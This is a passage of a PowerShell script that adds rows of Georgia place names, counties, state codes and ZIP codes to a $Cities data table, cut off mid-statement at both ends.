$null = $Cities.Rows.Add("Norcross","Gwinnett","Georgia","GA","13","30092") + $null = $Cities.Rows.Add("Norcross","Gwinnett","Georgia","GA","13","30093") + $null = $Cities.Rows.Add("Zcta 30094","Rockdale","Georgia","GA","13","30094") + $null = $Cities.Rows.Add("Zcta 30096","Gwinnett","Georgia","GA","13","30096") + $null = $Cities.Rows.Add("Zcta 30097","Fulton","Georgia","GA","13","30097") + $null = $Cities.Rows.Add("Zcta 300hh","Cobb","Georgia","GA","13","300HH") + $null = $Cities.Rows.Add("Acworth","Cobb","Georgia","GA","13","30101") + $null = $Cities.Rows.Add("Acworth","Cherokee","Georgia","GA","13","30102") + $null = $Cities.Rows.Add("Adairsville","Bartow","Georgia","GA","13","30103") + $null = $Cities.Rows.Add("Aragon","Polk","Georgia","GA","13","30104") + $null = $Cities.Rows.Add("Armuchee","Floyd","Georgia","GA","13","30105") + $null = $Cities.Rows.Add("Zcta 30106","Cobb","Georgia","GA","13","30106") + $null = $Cities.Rows.Add("Ball ground","Cherokee","Georgia","GA","13","30107") + $null = $Cities.Rows.Add("Bowdon","Carroll","Georgia","GA","13","30108") + $null = $Cities.Rows.Add("Bremen","Haralson","Georgia","GA","13","30110") + $null = $Cities.Rows.Add("Buchanan","Haralson","Georgia","GA","13","30113") + $null = $Cities.Rows.Add("Canton","Cherokee","Georgia","GA","13","30114") + $null = $Cities.Rows.Add("Canton","Cherokee","Georgia","GA","13","30115") + $null = $Cities.Rows.Add("Carrollton","Carroll","Georgia","GA","13","30116") + $null = $Cities.Rows.Add("Carrollton","Carroll","Georgia","GA","13","30117") + $null = $Cities.Rows.Add("Cartersville","Bartow","Georgia","GA","13","30120") + $null = $Cities.Rows.Add("Zcta 30121","Bartow","Georgia","GA","13","30121") + $null = $Cities.Rows.Add("Zcta 30122","Douglas","Georgia","GA","13","30122") + $null = $Cities.Rows.Add("Cave spring","Floyd","Georgia","GA","13","30124") + $null = $Cities.Rows.Add("Cedartown","Polk","Georgia","GA","13","30125") + $null = $Cities.Rows.Add("Zcta 30126","Cobb","Georgia","GA","13","30126") + $null = $Cities.Rows.Add("Zcta 30127","Cobb","Georgia","GA","13","30127") + $null = $Cities.Rows.Add("Dallas","Paulding","Georgia","GA","13","30132") + $null = $Cities.Rows.Add("Douglasville","Douglas","Georgia","GA","13","30134") + $null = $Cities.Rows.Add("Douglasville","Douglas","Georgia","GA","13","30135") + $null = $Cities.Rows.Add("Emerson","Bartow","Georgia","GA","13","30137") + $null = $Cities.Rows.Add("Fairmount","Gordon","Georgia","GA","13","30139") + $null = $Cities.Rows.Add("Hiram","Paulding","Georgia","GA","13","30141") + $null = $Cities.Rows.Add("Jasper","Pickens","Georgia","GA","13","30143") + $null = $Cities.Rows.Add("Kennesaw","Cobb","Georgia","GA","13","30144") + $null = $Cities.Rows.Add("Kingston","Bartow","Georgia","GA","13","30145") + $null = $Cities.Rows.Add("Lindale","Floyd","Georgia","GA","13","30147") + $null = $Cities.Rows.Add("Marble hill","Pickens","Georgia","GA","13","30148") + $null = $Cities.Rows.Add("Zcta 30152","Cobb","Georgia","GA","13","30152") + $null = $Cities.Rows.Add("Rockmart","Polk","Georgia","GA","13","30153") + $null = $Cities.Rows.Add("Zcta 30157","Paulding","Georgia","GA","13","30157") + $null = $Cities.Rows.Add("Rome","Floyd","Georgia","GA","13","30161") + $null = $Cities.Rows.Add("Rome","Floyd","Georgia","GA","13","30165") + $null = $Cities.Rows.Add("Zcta 30168","Cobb","Georgia","GA","13","30168") + $null = $Cities.Rows.Add("Roopville","Carroll","Georgia","GA","13","30170") + $null = $Cities.Rows.Add("Pine log","Bartow","Georgia","GA","13","30171") + $null = $Cities.Rows.Add("Silver creek","Floyd","Georgia","GA","13","30173") + $null = $Cities.Rows.Add("Talking rock","Pickens","Georgia","GA","13","30175") + $null = $Cities.Rows.Add("Tallapoosa","Haralson","Georgia","GA","13","30176") + $null = $Cities.Rows.Add("Tate","Pickens","Georgia","GA","13","30177") + $null = $Cities.Rows.Add("Taylorsville","Bartow","Georgia","GA","13","30178") + $null = $Cities.Rows.Add("Temple","Carroll","Georgia","GA","13","30179") + $null = $Cities.Rows.Add("Villa rica","Carroll","Georgia","GA","13","30180") + $null = $Cities.Rows.Add("Waco","Carroll","Georgia","GA","13","30182") + $null = $Cities.Rows.Add("Waleska","Cherokee","Georgia","GA","13","30183") + $null = $Cities.Rows.Add("White","Bartow","Georgia","GA","13","30184") + $null = $Cities.Rows.Add("Whitesburg","Carroll","Georgia","GA","13","30185") + $null = $Cities.Rows.Add("Winston","Douglas","Georgia","GA","13","30187") + $null = $Cities.Rows.Add("Woodstock","Cherokee","Georgia","GA","13","30188") + $null = $Cities.Rows.Add("Zcta 30189","Cherokee","Georgia","GA","13","30189") + $null = $Cities.Rows.Add("Zcta 301hh","Bartow","Georgia","GA","13","301HH") + $null = $Cities.Rows.Add("Barnesville","Lamar","Georgia","GA","13","30204") + $null = $Cities.Rows.Add("Brooks","Fayette","Georgia","GA","13","30205") + $null = $Cities.Rows.Add("Concord","Pike","Georgia","GA","13","30206") + $null = $Cities.Rows.Add("Fairburn","Fulton","Georgia","GA","13","30213") + $null = $Cities.Rows.Add("Woolsey","Fayette","Georgia","GA","13","30214") + $null = $Cities.Rows.Add("Zcta 30215","Fayette","Georgia","GA","13","30215") + $null = $Cities.Rows.Add("Flovilla","Butts","Georgia","GA","13","30216") + $null = $Cities.Rows.Add("Glenn","Heard","Georgia","GA","13","30217") + $null = $Cities.Rows.Add("Alvaton","Meriwether","Georgia","GA","13","30218") + $null = $Cities.Rows.Add("Grantville","Coweta","Georgia","GA","13","30220") + $null = $Cities.Rows.Add("Stovall","Meriwether","Georgia","GA","13","30222") + $null = $Cities.Rows.Add("Griffin","Spalding","Georgia","GA","13","30223") + $null = $Cities.Rows.Add("Griffin","Spalding","Georgia","GA","13","30224") + $null = $Cities.Rows.Add("Hampton","Henry","Georgia","GA","13","30228") + $null = $Cities.Rows.Add("Hogansville","Troup","Georgia","GA","13","30230") + $null = $Cities.Rows.Add("Jackson","Butts","Georgia","GA","13","30233") + $null = $Cities.Rows.Add("Jenkinsburg","Butts","Georgia","GA","13","30234") + $null = $Cities.Rows.Add("Jonesboro","Clayton","Georgia","GA","13","30236") + $null = $Cities.Rows.Add("Zcta 30238","Clayton","Georgia","GA","13","30238") + $null = $Cities.Rows.Add("La grange","Troup","Georgia","GA","13","30240") + $null = $Cities.Rows.Add("La grange","Troup","Georgia","GA","13","30241") + $null = $Cities.Rows.Add("Locust grove","Henry","Georgia","GA","13","30248") + $null = $Cities.Rows.Add("Lovejoy","Clayton","Georgia","GA","13","30250") + $null = $Cities.Rows.Add("Luthersville","Meriwether","Georgia","GA","13","30251") + $null = $Cities.Rows.Add("Zcta 30252","Henry","Georgia","GA","13","30252") + $null = $Cities.Rows.Add("Mc donough","Henry","Georgia","GA","13","30253") + $null = $Cities.Rows.Add("Meansville","Pike","Georgia","GA","13","30256") + $null = $Cities.Rows.Add("Milner","Lamar","Georgia","GA","13","30257") + $null = $Cities.Rows.Add("Molena","Pike","Georgia","GA","13","30258") + $null = $Cities.Rows.Add("Moreland","Coweta","Georgia","GA","13","30259") + $null = $Cities.Rows.Add("Morrow","Clayton","Georgia","GA","13","30260") + $null = $Cities.Rows.Add("Raymond","Coweta","Georgia","GA","13","30263") + $null = $Cities.Rows.Add("Newnan","Coweta","Georgia","GA","13","30265") + $null = $Cities.Rows.Add("Palmetto","Fulton","Georgia","GA","13","30268") + $null = $Cities.Rows.Add("Peachtree city","Fayette","Georgia","GA","13","30269") + $null = $Cities.Rows.Add("Rex","Clayton","Georgia","GA","13","30273") + $null = $Cities.Rows.Add("Riverdale","Clayton","Georgia","GA","13","30274") + $null = $Cities.Rows.Add("Sargent","Coweta","Georgia","GA","13","30275") + $null = $Cities.Rows.Add("Senoia","Coweta","Georgia","GA","13","30276") + $null = $Cities.Rows.Add("Sharpsburg","Coweta","Georgia","GA","13","30277") + $null = $Cities.Rows.Add("Stockbridge","Henry","Georgia","GA","13","30281") + $null = $Cities.Rows.Add("The rock","Upson","Georgia","GA","13","30285") + $null = $Cities.Rows.Add("Thomaston","Upson","Georgia","GA","13","30286") + $null = $Cities.Rows.Add("Zcta 30288","Clayton","Georgia","GA","13","30288") + $null = $Cities.Rows.Add("Tyrone","Fayette","Georgia","GA","13","30290") + $null = $Cities.Rows.Add("Union city","Fulton","Georgia","GA","13","30291") + $null = $Cities.Rows.Add("Williamson","Pike","Georgia","GA","13","30292") + $null = $Cities.Rows.Add("Woodbury","Meriwether","Georgia","GA","13","30293") + $null = $Cities.Rows.Add("Zcta 30294","DeKalb","Georgia","GA","13","30294") + $null = $Cities.Rows.Add("Zebulon","Pike","Georgia","GA","13","30295") + $null = $Cities.Rows.Add("Riverdale","Clayton","Georgia","GA","13","30296") + $null = $Cities.Rows.Add("Zcta 30297","Clayton","Georgia","GA","13","30297") + $null = $Cities.Rows.Add("Zcta 302hh","Butts","Georgia","GA","13","302HH") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30303") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30305") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30306") + $null = $Cities.Rows.Add("Atlanta","DeKalb","Georgia","GA","13","30307") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30308") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30309") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30310") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30311") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30312") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30313") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30314") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30315") + $null = $Cities.Rows.Add("Atlanta","DeKalb","Georgia","GA","13","30316") + $null = $Cities.Rows.Add("Atlanta","DeKalb","Georgia","GA","13","30317") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30318") + $null = $Cities.Rows.Add("Atlanta","DeKalb","Georgia","GA","13","30319") + $null = $Cities.Rows.Add("Atlanta","DeKalb","Georgia","GA","13","30322") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30324") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30326") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30327") + $null = $Cities.Rows.Add("Sandy springs","Fulton","Georgia","GA","13","30328") + $null = $Cities.Rows.Add("Atlanta","DeKalb","Georgia","GA","13","30329") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30331") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30336") + $null = $Cities.Rows.Add("College park","Fulton","Georgia","GA","13","30337") + $null = $Cities.Rows.Add("Dunwoody","DeKalb","Georgia","GA","13","30338") + $null = $Cities.Rows.Add("Atlanta","Cobb","Georgia","GA","13","30339") + $null = $Cities.Rows.Add("Doraville","DeKalb","Georgia","GA","13","30340") + $null = $Cities.Rows.Add("Chamblee","DeKalb","Georgia","GA","13","30341") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30342") + $null = $Cities.Rows.Add("East point","Fulton","Georgia","GA","13","30344") + $null = $Cities.Rows.Add("Atlanta","DeKalb","Georgia","GA","13","30345") + $null = $Cities.Rows.Add("Atlanta","DeKalb","Georgia","GA","13","30346") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30349") + $null = $Cities.Rows.Add("Atlanta","Fulton","Georgia","GA","13","30350") + $null = $Cities.Rows.Add("Hapeville","Fulton","Georgia","GA","13","30354") + $null = $Cities.Rows.Add("Atlanta","DeKalb","Georgia","GA","13","30360") + $null = $Cities.Rows.Add("Zcta 303hh","Cobb","Georgia","GA","13","303HH") + $null = $Cities.Rows.Add("Oak park","Emanuel","Georgia","GA","13","30401") + $null = $Cities.Rows.Add("Ailey","Montgomery","Georgia","GA","13","30410") + $null = $Cities.Rows.Add("Alamo","Wheeler","Georgia","GA","13","30411") + $null = $Cities.Rows.Add("Alston","Montgomery","Georgia","GA","13","30412") + $null = $Cities.Rows.Add("Bartow","Jefferson","Georgia","GA","13","30413") + $null = $Cities.Rows.Add("Bellville","Evans","Georgia","GA","13","30414") + $null = $Cities.Rows.Add("Brooklet","Bulloch","Georgia","GA","13","30415") + $null = $Cities.Rows.Add("Claxton","Evans","Georgia","GA","13","30417") + $null = $Cities.Rows.Add("Cobbtown","Tattnall","Georgia","GA","13","30420") + $null = $Cities.Rows.Add("Collins","Tattnall","Georgia","GA","13","30421") + $null = $Cities.Rows.Add("Daisy","Evans","Georgia","GA","13","30423") + $null = $Cities.Rows.Add("Garfield","Emanuel","Georgia","GA","13","30425") + $null = $Cities.Rows.Add("Girard","Burke","Georgia","GA","13","30426") + $null = $Cities.Rows.Add("Glennville","Tattnall","Georgia","GA","13","30427") + $null = $Cities.Rows.Add("Glenwood","Wheeler","Georgia","GA","13","30428") + $null = $Cities.Rows.Add("Hagan","Evans","Georgia","GA","13","30429") + $null = $Cities.Rows.Add("Louisville","Jefferson","Georgia","GA","13","30434") + $null = $Cities.Rows.Add("Lyons","Toombs","Georgia","GA","13","30436") + $null = $Cities.Rows.Add("Manassas","Tattnall","Georgia","GA","13","30438") + $null = $Cities.Rows.Add("Metter","Candler","Georgia","GA","13","30439") + $null = $Cities.Rows.Add("Midville","Emanuel","Georgia","GA","13","30441") + $null = $Cities.Rows.Add("Millen","Jenkins","Georgia","GA","13","30442") + $null = $Cities.Rows.Add("Mount vernon","Montgomery","Georgia","GA","13","30445") + $null = $Cities.Rows.Add("Newington","Screven","Georgia","GA","13","30446") + $null = $Cities.Rows.Add("Norristown","Emanuel","Georgia","GA","13","30447") + $null = $Cities.Rows.Add("Nunez","Emanuel","Georgia","GA","13","30448") + $null = $Cities.Rows.Add("Portal","Bulloch","Georgia","GA","13","30450") + $null = $Cities.Rows.Add("Register","Bulloch","Georgia","GA","13","30452") + $null = $Cities.Rows.Add("Reidsville","Tattnall","Georgia","GA","13","30453") + $null = $Cities.Rows.Add("Rockledge","Laurens","Georgia","GA","13","30454") + $null = $Cities.Rows.Add("Rocky ford","Screven","Georgia","GA","13","30455") + $null = $Cities.Rows.Add("Sardis","Burke","Georgia","GA","13","30456") + $null = $Cities.Rows.Add("Soperton","Treutlen","Georgia","GA","13","30457") + $null = $Cities.Rows.Add("Statesboro","Bulloch","Georgia","GA","13","30458") + $null = $Cities.Rows.Add("Zcta 30461","Bulloch","Georgia","GA","13","30461") + $null = $Cities.Rows.Add("Stillmore","Emanuel","Georgia","GA","13","30464") + $null = $Cities.Rows.Add("Hiltonia","Screven","Georgia","GA","13","30467") + $null = $Cities.Rows.Add("Tarrytown","Montgomery","Georgia","GA","13","30470") + $null = $Cities.Rows.Add("Twin city","Emanuel","Georgia","GA","13","30471") + $null = $Cities.Rows.Add("Uvalda","Montgomery","Georgia","GA","13","30473") + $null = $Cities.Rows.Add("Vidalia","Toombs","Georgia","GA","13","30474") + $null = $Cities.Rows.Add("Wadley","Jefferson","Georgia","GA","13","30477") + $null = $Cities.Rows.Add("Zcta 304hh","Bulloch","Georgia","GA","13","304HH") + $null = $Cities.Rows.Add("Zcta 304xx","Evans","Georgia","GA","13","304XX") + $null = $Cities.Rows.Add("Gainesville","Hall","Georgia","GA","13","30501") + $null = $Cities.Rows.Add("Gainesville","Hall","Georgia","GA","13","30504") + $null = $Cities.Rows.Add("Gainesville","Hall","Georgia","GA","13","30506") + $null = $Cities.Rows.Add("Gainesville","Hall","Georgia","GA","13","30507") + $null = $Cities.Rows.Add("Alto","Habersham","Georgia","GA","13","30510") + $null = $Cities.Rows.Add("Baldwin","Banks","Georgia","GA","13","30511") + $null = $Cities.Rows.Add("Blairsville","Union","Georgia","GA","13","30512") + $null = $Cities.Rows.Add("Blue ridge","Fannin","Georgia","GA","13","30513") + $null = $Cities.Rows.Add("Bowersville","Hart","Georgia","GA","13","30516") + $null = $Cities.Rows.Add("Braselton","Jackson","Georgia","GA","13","30517") + $null = $Cities.Rows.Add("Buford","Gwinnett","Georgia","GA","13","30518") + $null = $Cities.Rows.Add("Zcta 30519","Gwinnett","Georgia","GA","13","30519") + $null = $Cities.Rows.Add("Canon","Franklin","Georgia","GA","13","30520") + $null = $Cities.Rows.Add("Carnesville","Franklin","Georgia","GA","13","30521") + $null = $Cities.Rows.Add("Cherrylog","Gilmer","Georgia","GA","13","30522") + $null = $Cities.Rows.Add("Clarkesville","Habersham","Georgia","GA","13","30523") + $null = $Cities.Rows.Add("Clayton","Rabun","Georgia","GA","13","30525") + $null = $Cities.Rows.Add("Clermont","Hall","Georgia","GA","13","30527") + $null = $Cities.Rows.Add("Cleveland","White","Georgia","GA","13","30528") + $null = $Cities.Rows.Add("Commerce","Jackson","Georgia","GA","13","30529") + $null = $Cities.Rows.Add("Zcta 30530","Banks","Georgia","GA","13","30530") + $null = $Cities.Rows.Add("Cornelia","Habersham","Georgia","GA","13","30531") + $null = $Cities.Rows.Add("Dahlonega","Lumpkin","Georgia","GA","13","30533") + $null = $Cities.Rows.Add("Juno","Dawson","Georgia","GA","13","30534") + $null = $Cities.Rows.Add("Demorest","Habersham","Georgia","GA","13","30535") + $null = $Cities.Rows.Add("Sky valley","Rabun","Georgia","GA","13","30537") + $null = $Cities.Rows.Add("Eastanollee","Stephens","Georgia","GA","13","30538") + $null = $Cities.Rows.Add("East ellijay","Gilmer","Georgia","GA","13","30539") + $null = $Cities.Rows.Add("Ellijay","Gilmer","Georgia","GA","13","30540") + $null = $Cities.Rows.Add("Epworth","Fannin","Georgia","GA","13","30541") + $null = $Cities.Rows.Add("Flowery branch","Hall","Georgia","GA","13","30542") + $null = $Cities.Rows.Add("Gillsville","Hall","Georgia","GA","13","30543") + $null = $Cities.Rows.Add("Helen","White","Georgia","GA","13","30545") + $null = $Cities.Rows.Add("Hiawassee","Towns","Georgia","GA","13","30546") + $null = $Cities.Rows.Add("Homer","Banks","Georgia","GA","13","30547") + $null = $Cities.Rows.Add("Hoschton","Jackson","Georgia","GA","13","30548") + $null = $Cities.Rows.Add("Jefferson","Jackson","Georgia","GA","13","30549") + $null = $Cities.Rows.Add("Lakemont","Rabun","Georgia","GA","13","30552") + $null = $Cities.Rows.Add("Lavonia","Franklin","Georgia","GA","13","30553") + $null = $Cities.Rows.Add("Lula","Hall","Georgia","GA","13","30554") + $null = $Cities.Rows.Add("Mc caysville","Fannin","Georgia","GA","13","30555") + $null = $Cities.Rows.Add("Martin","Stephens","Georgia","GA","13","30557") + $null = $Cities.Rows.Add("Maysville","Jackson","Georgia","GA","13","30558") + $null = $Cities.Rows.Add("Mineral bluff","Fannin","Georgia","GA","13","30559") + $null = $Cities.Rows.Add("Morganton","Fannin","Georgia","GA","13","30560") + $null = $Cities.Rows.Add("Mountain city","Rabun","Georgia","GA","13","30562") + $null = $Cities.Rows.Add("Mount airy","Habersham","Georgia","GA","13","30563") + $null = $Cities.Rows.Add("Murrayville","Hall","Georgia","GA","13","30564") + $null = $Cities.Rows.Add("Nicholson","Jackson","Georgia","GA","13","30565") + $null = $Cities.Rows.Add("Oakwood","Hall","Georgia","GA","13","30566") + $null = $Cities.Rows.Add("Pendergrass","Jackson","Georgia","GA","13","30567") + $null = $Cities.Rows.Add("Rabun gap","Rabun","Georgia","GA","13","30568") + $null = $Cities.Rows.Add("Sautee nacoochee","White","Georgia","GA","13","30571") + $null = $Cities.Rows.Add("Suches","Union","Georgia","GA","13","30572") + $null = $Cities.Rows.Add("Talmo","Jackson","Georgia","GA","13","30575") + $null = $Cities.Rows.Add("Tiger","Rabun","Georgia","GA","13","30576") + $null = $Cities.Rows.Add("Toccoa","Stephens","Georgia","GA","13","30577") + $null = $Cities.Rows.Add("Wiley","Rabun","Georgia","GA","13","30581") + $null = $Cities.Rows.Add("Young harris","Towns","Georgia","GA","13","30582") + $null = $Cities.Rows.Add("Toccoa falls","Stephens","Georgia","GA","13","30598") + $null = $Cities.Rows.Add("Zcta 305hh","Fannin","Georgia","GA","13","305HH") + $null = $Cities.Rows.Add("Athens","Clarke","Georgia","GA","13","30601") + $null = $Cities.Rows.Add("Athens","Clarke","Georgia","GA","13","30602") + $null = $Cities.Rows.Add("Athens","Clarke","Georgia","GA","13","30605") + $null = $Cities.Rows.Add("Athens","Clarke","Georgia","GA","13","30606") + $null = $Cities.Rows.Add("Athens","Clarke","Georgia","GA","13","30607") + $null = $Cities.Rows.Add("Arnoldsville","Oglethorpe","Georgia","GA","13","30619") + $null = $Cities.Rows.Add("Bethlehem","Barrow","Georgia","GA","13","30620") + $null = $Cities.Rows.Add("Bishop","Oconee","Georgia","GA","13","30621") + $null = $Cities.Rows.Add("Bogart","Oconee","Georgia","GA","13","30622") + $null = $Cities.Rows.Add("Bowman","Elbert","Georgia","GA","13","30624") + $null = $Cities.Rows.Add("Buckhead","Morgan","Georgia","GA","13","30625") + $null = $Cities.Rows.Add("Carlton","Oglethorpe","Georgia","GA","13","30627") + $null = $Cities.Rows.Add("Colbert","Madison","Georgia","GA","13","30628") + $null = $Cities.Rows.Add("Comer","Madison","Georgia","GA","13","30629") + $null = $Cities.Rows.Add("Crawford","Oglethorpe","Georgia","GA","13","30630") + $null = $Cities.Rows.Add("Crawfordville","Taliaferro","Georgia","GA","13","30631") + $null = $Cities.Rows.Add("Danielsville","Madison","Georgia","GA","13","30633") + $null = $Cities.Rows.Add("Dewy rose","Elbert","Georgia","GA","13","30634") + $null = $Cities.Rows.Add("Elberton","Elbert","Georgia","GA","13","30635") + $null = $Cities.Rows.Add("Farmington","Oconee","Georgia","GA","13","30638") + $null = $Cities.Rows.Add("Franklin springs","Franklin","Georgia","GA","13","30639") + $null = $Cities.Rows.Add("Good hope","Walton","Georgia","GA","13","30641") + $null = $Cities.Rows.Add("Greensboro","Greene","Georgia","GA","13","30642") + $null = $Cities.Rows.Add("Hartwell","Hart","Georgia","GA","13","30643") + $null = $Cities.Rows.Add("Hull","Madison","Georgia","GA","13","30646") + $null = $Cities.Rows.Add("Lexington","Oglethorpe","Georgia","GA","13","30648") + $null = $Cities.Rows.Add("Madison","Morgan","Georgia","GA","13","30650") + $null = $Cities.Rows.Add("Monroe","Walton","Georgia","GA","13","30655") + $null = $Cities.Rows.Add("Zcta 30656","Walton","Georgia","GA","13","30656") + $null = $Cities.Rows.Add("Philomath","Wilkes","Georgia","GA","13","30660") + $null = $Cities.Rows.Add("Royston","Franklin","Georgia","GA","13","30662") + $null = $Cities.Rows.Add("Rutledge","Morgan","Georgia","GA","13","30663") + $null = $Cities.Rows.Add("Sharon","Taliaferro","Georgia","GA","13","30664") + $null = $Cities.Rows.Add("Siloam","Greene","Georgia","GA","13","30665") + $null = $Cities.Rows.Add("Statham","Barrow","Georgia","GA","13","30666") + $null = $Cities.Rows.Add("Stephens","Oglethorpe","Georgia","GA","13","30667") + $null = $Cities.Rows.Add("Danburg","Wilkes","Georgia","GA","13","30668") + $null = $Cities.Rows.Add("Union point","Greene","Georgia","GA","13","30669") + $null = $Cities.Rows.Add("Maxeys","Oglethorpe","Georgia","GA","13","30671") + $null = $Cities.Rows.Add("Washington","Wilkes","Georgia","GA","13","30673") + $null = $Cities.Rows.Add("Watkinsville","Oconee","Georgia","GA","13","30677") + $null = $Cities.Rows.Add("White plains","Greene","Georgia","GA","13","30678") + $null = $Cities.Rows.Add("Winder","Barrow","Georgia","GA","13","30680") + $null = $Cities.Rows.Add("Winterville","Clarke","Georgia","GA","13","30683") + $null = $Cities.Rows.Add("Zcta 306hh","Elbert","Georgia","GA","13","306HH") + $null = $Cities.Rows.Add("Calhoun","Gordon","Georgia","GA","13","30701") + $null = $Cities.Rows.Add("Chatsworth","Murray","Georgia","GA","13","30705") + $null = $Cities.Rows.Add("Chickamauga","Walker","Georgia","GA","13","30707") + $null = $Cities.Rows.Add("Cisco","Murray","Georgia","GA","13","30708") + $null = $Cities.Rows.Add("Cohutta","Whitfield","Georgia","GA","13","30710") + $null = $Cities.Rows.Add("Crandall","Murray","Georgia","GA","13","30711") + $null = $Cities.Rows.Add("Dalton","Whitfield","Georgia","GA","13","30720") + $null = $Cities.Rows.Add("Dalton","Whitfield","Georgia","GA","13","30721") + $null = $Cities.Rows.Add("Eton","Murray","Georgia","GA","13","30724") + $null = $Cities.Rows.Add("Flintstone","Walker","Georgia","GA","13","30725") + $null = $Cities.Rows.Add("Graysville","Catoosa","Georgia","GA","13","30726") + $null = $Cities.Rows.Add("La fayette","Walker","Georgia","GA","13","30728") + $null = $Cities.Rows.Add("Lyerly","Chattooga","Georgia","GA","13","30730") + $null = $Cities.Rows.Add("Cloudland","Chattooga","Georgia","GA","13","30731") + $null = $Cities.Rows.Add("Plainville","Gordon","Georgia","GA","13","30733") + $null = $Cities.Rows.Add("Ranger","Gordon","Georgia","GA","13","30734") + $null = $Cities.Rows.Add("Hill city","Gordon","Georgia","GA","13","30735") + $null = $Cities.Rows.Add("Ringgold","Catoosa","Georgia","GA","13","30736") + $null = $Cities.Rows.Add("Rising fawn","Dade","Georgia","GA","13","30738") + $null = $Cities.Rows.Add("Rock spring","Walker","Georgia","GA","13","30739") + $null = $Cities.Rows.Add("Rocky face","Whitfield","Georgia","GA","13","30740") + $null = $Cities.Rows.Add("Rossville","Walker","Georgia","GA","13","30741") + $null = $Cities.Rows.Add("Fort oglethorpe","Catoosa","Georgia","GA","13","30742") + $null = $Cities.Rows.Add("Sugar valley","Gordon","Georgia","GA","13","30746") + $null = $Cities.Rows.Add("Summerville","Chattooga","Georgia","GA","13","30747") + $null = $Cities.Rows.Add("Lookout mountain","Walker","Georgia","GA","13","30750") + $null = $Cities.Rows.Add("Trenton","Dade","Georgia","GA","13","30752") + $null = $Cities.Rows.Add("Trion","Chattooga","Georgia","GA","13","30753") + $null = $Cities.Rows.Add("Tunnel hill","Whitfield","Georgia","GA","13","30755") + $null = $Cities.Rows.Add("Wildwood","Dade","Georgia","GA","13","30757") + $null = $Cities.Rows.Add("Zcta 307hh","Catoosa","Georgia","GA","13","307HH") + $null = $Cities.Rows.Add("Zcta 307xx","Murray","Georgia","GA","13","307XX") + $null = $Cities.Rows.Add("Appling","Columbia","Georgia","GA","13","30802") + $null = $Cities.Rows.Add("Avera","Jefferson","Georgia","GA","13","30803") + $null = $Cities.Rows.Add("Blythe","Richmond","Georgia","GA","13","30805") + $null = $Cities.Rows.Add("Camak","Warren","Georgia","GA","13","30807") + $null = $Cities.Rows.Add("Dearing","McDuffie","Georgia","GA","13","30808") + $null = $Cities.Rows.Add("Evans","Columbia","Georgia","GA","13","30809") + $null = $Cities.Rows.Add("Gibson","Glascock","Georgia","GA","13","30810") + $null = $Cities.Rows.Add("Grovetown","Columbia","Georgia","GA","13","30813") + $null = $Cities.Rows.Add("Harlem","Columbia","Georgia","GA","13","30814") + $null = $Cities.Rows.Add("Hephzibah","Richmond","Georgia","GA","13","30815") + $null = $Cities.Rows.Add("Keysville","Burke","Georgia","GA","13","30816") + $null = $Cities.Rows.Add("Lincolnton","Lincoln","Georgia","GA","13","30817") + $null = $Cities.Rows.Add("Matthews","Jefferson","Georgia","GA","13","30818") + $null = $Cities.Rows.Add("Mitchell","Glascock","Georgia","GA","13","30820") + $null = $Cities.Rows.Add("Norwood","Warren","Georgia","GA","13","30821") + $null = $Cities.Rows.Add("Perkins","Jenkins","Georgia","GA","13","30822") + $null = $Cities.Rows.Add("Stapleton","Jefferson","Georgia","GA","13","30823") + $null = $Cities.Rows.Add("Thomson","McDuffie","Georgia","GA","13","30824") + $null = $Cities.Rows.Add("Warrenton","Warren","Georgia","GA","13","30828") + $null = $Cities.Rows.Add("Waynesboro","Burke","Georgia","GA","13","30830") + $null = $Cities.Rows.Add("Wrens","Jefferson","Georgia","GA","13","30833") + $null = $Cities.Rows.Add("Zcta 308hh","Burke","Georgia","GA","13","308HH") + $null = $Cities.Rows.Add("Zcta 308xx","Richmond","Georgia","GA","13","308XX") + $null = $Cities.Rows.Add("Augusta","Richmond","Georgia","GA","13","30901") + $null = $Cities.Rows.Add("Augusta","Richmond","Georgia","GA","13","30904") + $null = $Cities.Rows.Add("Fort gordon","Richmond","Georgia","GA","13","30905") + $null = $Cities.Rows.Add("Peach orchard","Richmond","Georgia","GA","13","30906") + $null = $Cities.Rows.Add("Martinez","Columbia","Georgia","GA","13","30907") + $null = $Cities.Rows.Add("Forest hills","Richmond","Georgia","GA","13","30909") + $null = $Cities.Rows.Add("Zcta 309hh","Columbia","Georgia","GA","13","309HH") + $null = $Cities.Rows.Add("Abbeville","Wilcox","Georgia","GA","13","31001") + $null = $Cities.Rows.Add("Adrian","Emanuel","Georgia","GA","13","31002") + $null = $Cities.Rows.Add("Allentown","Wilkinson","Georgia","GA","13","31003") + $null = $Cities.Rows.Add("Bonaire","Houston","Georgia","GA","13","31005") + $null = $Cities.Rows.Add("Butler","Taylor","Georgia","GA","13","31006") + $null = $Cities.Rows.Add("Byromville","Dooly","Georgia","GA","13","31007") + $null = $Cities.Rows.Add("Powersville","Peach","Georgia","GA","13","31008") + $null = $Cities.Rows.Add("Cadwell","Laurens","Georgia","GA","13","31009") + $null = $Cities.Rows.Add("Chauncey","Dodge","Georgia","GA","13","31011") + $null = $Cities.Rows.Add("Chester","Dodge","Georgia","GA","13","31012") + $null = $Cities.Rows.Add("Cochran","Bleckley","Georgia","GA","13","31014") + $null = $Cities.Rows.Add("Cordele","Crisp","Georgia","GA","13","31015") + $null = 